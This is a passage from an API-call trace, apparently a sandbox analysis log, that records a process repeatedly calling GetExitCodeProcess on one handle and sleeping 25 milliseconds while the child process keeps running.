lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0189.530] Sleep (dwMilliseconds=0x19) [0189.567] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0189.567] Sleep (dwMilliseconds=0x19) [0189.605] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0189.605] Sleep (dwMilliseconds=0x19) [0189.647] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0189.647] Sleep (dwMilliseconds=0x19) [0189.684] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0189.684] Sleep (dwMilliseconds=0x19) [0189.719] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0189.720] Sleep (dwMilliseconds=0x19) [0189.756] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0189.757] Sleep (dwMilliseconds=0x19) [0189.796] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0189.796] Sleep (dwMilliseconds=0x19) [0189.832] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0189.832] Sleep (dwMilliseconds=0x19) [0189.883] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0189.883] Sleep (dwMilliseconds=0x19) [0189.919] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0189.919] Sleep (dwMilliseconds=0x19) [0189.976] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0189.976] Sleep (dwMilliseconds=0x19) [0190.024] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0190.025] Sleep (dwMilliseconds=0x19) [0190.072] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0190.072] Sleep (dwMilliseconds=0x19) [0190.281] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0190.281] Sleep (dwMilliseconds=0x19) [0190.336] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0190.336] Sleep (dwMilliseconds=0x19) [0190.382] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0190.382] Sleep (dwMilliseconds=0x19) [0190.419] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0190.419] Sleep (dwMilliseconds=0x19) [0190.463] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0190.463] Sleep (dwMilliseconds=0x19) [0190.503] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0190.503] Sleep (dwMilliseconds=0x19) [0190.551] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0190.551] Sleep (dwMilliseconds=0x19) [0190.608] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0190.608] Sleep (dwMilliseconds=0x19) [0190.648] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0190.648] Sleep (dwMilliseconds=0x19) [0190.683] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0190.683] Sleep (dwMilliseconds=0x19) [0190.718] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0190.718] Sleep (dwMilliseconds=0x19) [0190.762] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0190.762] Sleep (dwMilliseconds=0x19) [0190.803] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0190.803] Sleep (dwMilliseconds=0x19) [0190.839] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0190.839] Sleep (dwMilliseconds=0x19) [0190.891] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0190.891] Sleep (dwMilliseconds=0x19) [0190.926] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0190.926] Sleep (dwMilliseconds=0x19) [0190.962] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0190.962] Sleep (dwMilliseconds=0x19) [0190.996] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0190.996] Sleep (dwMilliseconds=0x19) [0191.032] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0191.032] Sleep (dwMilliseconds=0x19) [0191.068] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0191.068] Sleep (dwMilliseconds=0x19) [0191.103] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0191.103] Sleep (dwMilliseconds=0x19) [0191.204] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0191.204] Sleep (dwMilliseconds=0x19) [0191.240] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0191.240] Sleep (dwMilliseconds=0x19) [0191.292] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0191.292] Sleep (dwMilliseconds=0x19) [0191.327] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0191.327] Sleep (dwMilliseconds=0x19) [0191.422] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0191.422] Sleep (dwMilliseconds=0x19) [0191.467] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0191.468] Sleep (dwMilliseconds=0x19) [0191.523] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0191.523] Sleep (dwMilliseconds=0x19) [0191.559] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0191.559] Sleep (dwMilliseconds=0x19) [0191.594] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0191.594] Sleep (dwMilliseconds=0x19) [0191.640] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0191.640] Sleep (dwMilliseconds=0x19) [0191.676] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0191.676] Sleep (dwMilliseconds=0x19) [0191.711] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0191.711] Sleep (dwMilliseconds=0x19) [0191.749] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0191.749] Sleep (dwMilliseconds=0x19) [0191.785] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0191.785] Sleep (dwMilliseconds=0x19) [0191.822] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0191.822] Sleep (dwMilliseconds=0x19) [0191.858] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0191.858] Sleep (dwMilliseconds=0x19) [0191.908] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0191.908] Sleep (dwMilliseconds=0x19) [0191.944] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0191.944] Sleep (dwMilliseconds=0x19) [0191.980] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0191.980] Sleep (dwMilliseconds=0x19) [0192.015] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0192.015] Sleep (dwMilliseconds=0x19) [0192.050] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0192.050] Sleep (dwMilliseconds=0x19) [0192.092] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0192.092] Sleep (dwMilliseconds=0x19) [0192.253] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0192.253] Sleep (dwMilliseconds=0x19) [0192.291] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0192.291] Sleep (dwMilliseconds=0x19) [0192.325] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0192.325] Sleep (dwMilliseconds=0x19) [0192.382] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0192.382] Sleep (dwMilliseconds=0x19) [0192.418] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0192.421] Sleep (dwMilliseconds=0x19) [0192.469] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0192.469] Sleep (dwMilliseconds=0x19) [0192.633] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0192.634] Sleep (dwMilliseconds=0x19) [0192.686] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0192.686] Sleep (dwMilliseconds=0x19) [0192.736] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0192.736] Sleep (dwMilliseconds=0x19) [0192.784] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0192.784] Sleep (dwMilliseconds=0x19) [0192.840] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0192.840] Sleep (dwMilliseconds=0x19) [0192.913] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0192.914] Sleep (dwMilliseconds=0x19) [0192.958] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0192.958] Sleep (dwMilliseconds=0x19) [0192.994] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0192.994] Sleep (dwMilliseconds=0x19) [0193.029] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0193.029] Sleep (dwMilliseconds=0x19) [0193.075] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0193.075] Sleep (dwMilliseconds=0x19) [0193.114] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0193.114] Sleep (dwMilliseconds=0x19) [0193.242] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0193.242] Sleep (dwMilliseconds=0x19) [0193.279] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0193.279] Sleep (dwMilliseconds=0x19) [0193.314] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0193.314] Sleep (dwMilliseconds=0x19) [0193.351] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0193.351] Sleep (dwMilliseconds=0x19) [0193.386] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0193.386] Sleep (dwMilliseconds=0x19) [0193.429] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0193.429] Sleep (dwMilliseconds=0x19) [0193.469] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0193.469] Sleep (dwMilliseconds=0x19) [0193.514] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0193.514] Sleep (dwMilliseconds=0x19) [0193.551] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0193.551] Sleep (dwMilliseconds=0x19) [0193.588] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0193.588] Sleep (dwMilliseconds=0x19) [0193.625] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0193.625] Sleep (dwMilliseconds=0x19) [0193.663] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0193.663] Sleep (dwMilliseconds=0x19) [0193.702] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0193.702] Sleep (dwMilliseconds=0x19) [0193.822] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0193.822] Sleep (dwMilliseconds=0x19) [0193.864] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0193.865] Sleep (dwMilliseconds=0x19) [0193.931] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0193.931] Sleep (dwMilliseconds=0x19) [0193.969] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0193.970] Sleep (dwMilliseconds=0x19) [0194.228] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0194.228] Sleep (dwMilliseconds=0x19) [0194.311] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0194.311] Sleep (dwMilliseconds=0x19) [0194.406] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0194.407] Sleep (dwMilliseconds=0x19) [0194.479] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0194.479] Sleep (dwMilliseconds=0x19) [0194.541] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0194.541] Sleep (dwMilliseconds=0x19) [0194.610] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0194.610] Sleep (dwMilliseconds=0x19) [0194.669] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0194.669] Sleep (dwMilliseconds=0x19) [0194.703] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0194.704] Sleep (dwMilliseconds=0x19) [0194.811] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0194.811] Sleep (dwMilliseconds=0x19) [0194.851] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0194.851] Sleep (dwMilliseconds=0x19) [0194.900] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0194.900] Sleep (dwMilliseconds=0x19) [0194.967] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0194.967] Sleep (dwMilliseconds=0x19) [0195.002] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0195.003] Sleep (dwMilliseconds=0x19) [0195.038] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0195.038] Sleep (dwMilliseconds=0x19) [0195.074] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0195.074] Sleep (dwMilliseconds=0x19) [0195.110] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0195.110] Sleep (dwMilliseconds=0x19) [0195.247] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0195.247] Sleep (dwMilliseconds=0x19) [0195.293] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0195.293] Sleep (dwMilliseconds=0x19) [0195.329] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0195.329] Sleep (dwMilliseconds=0x19) [0195.366] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0195.366] Sleep (dwMilliseconds=0x19) [0195.401] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0195.401] Sleep (dwMilliseconds=0x19) [0195.441] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0195.442] Sleep (dwMilliseconds=0x19) [0195.513] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0195.513] Sleep (dwMilliseconds=0x19) [0195.549] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0195.549] Sleep (dwMilliseconds=0x19) [0195.592] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0195.592] Sleep (dwMilliseconds=0x19) [0195.641] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0195.641] Sleep (dwMilliseconds=0x19) [0195.685] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0195.685] Sleep (dwMilliseconds=0x19) [0195.726] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0195.726] Sleep (dwMilliseconds=0x19) [0195.779] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0195.779] Sleep (dwMilliseconds=0x19) [0195.818] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0195.818] Sleep (dwMilliseconds=0x19) [0195.857] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0195.858] Sleep (dwMilliseconds=0x19) [0195.905] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0195.905] Sleep (dwMilliseconds=0x19) [0195.940] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0195.940] Sleep (dwMilliseconds=0x19) [0195.975] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0195.976] Sleep (dwMilliseconds=0x19) [0196.010] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0196.010] Sleep (dwMilliseconds=0x19) [0196.089] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0196.089] Sleep (dwMilliseconds=0x19) [0196.319] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0196.319] Sleep (dwMilliseconds=0x19) [0196.371] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0196.371] Sleep (dwMilliseconds=0x19) [0196.407] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0196.407] Sleep (dwMilliseconds=0x19) [0196.442] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0196.442] Sleep (dwMilliseconds=0x19) [0196.484] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0196.484] Sleep (dwMilliseconds=0x19) [0196.520] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0196.520] Sleep (dwMilliseconds=0x19) [0196.556] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0196.556] Sleep (dwMilliseconds=0x19) [0196.591] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0196.591] Sleep (dwMilliseconds=0x19) [0196.714] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0196.714] Sleep (dwMilliseconds=0x19) [0196.762] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0196.762] Sleep (dwMilliseconds=0x19) [0196.800] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0196.800] Sleep (dwMilliseconds=0x19) [0196.863] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0196.863] Sleep (dwMilliseconds=0x19) [0196.940] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0196.940] Sleep (dwMilliseconds=0x19) [0196.995] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0196.995] Sleep (dwMilliseconds=0x19) [0197.039] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0197.039] Sleep (dwMilliseconds=0x19) [0197.079] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0197.080] Sleep (dwMilliseconds=0x19) [0197.197] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0197.197] Sleep (dwMilliseconds=0x19) [0197.241] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0197.241] Sleep (dwMilliseconds=0x19) [0197.274] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0197.274] Sleep (dwMilliseconds=0x19) [0197.316] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0197.316] Sleep (dwMilliseconds=0x19) [0197.359] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0197.359] Sleep (dwMilliseconds=0x19) [0197.390] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0197.391] Sleep (dwMilliseconds=0x19) [0197.460] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0197.460] Sleep (dwMilliseconds=0x19) [0197.493] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0197.493] Sleep (dwMilliseconds=0x19) [0197.530] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0197.530] Sleep (dwMilliseconds=0x19) [0197.589] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0197.590] Sleep (dwMilliseconds=0x19) [0197.641] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0197.641] Sleep (dwMilliseconds=0x19) [0197.676] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0197.676] Sleep (dwMilliseconds=0x19) [0197.703] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0197.703] Sleep (dwMilliseconds=0x19) [0197.736] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0197.736] Sleep (dwMilliseconds=0x19) [0197.775] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0197.775] Sleep (dwMilliseconds=0x19) [0197.819] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0197.819] Sleep (dwMilliseconds=0x19) [0197.848] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0197.848] Sleep 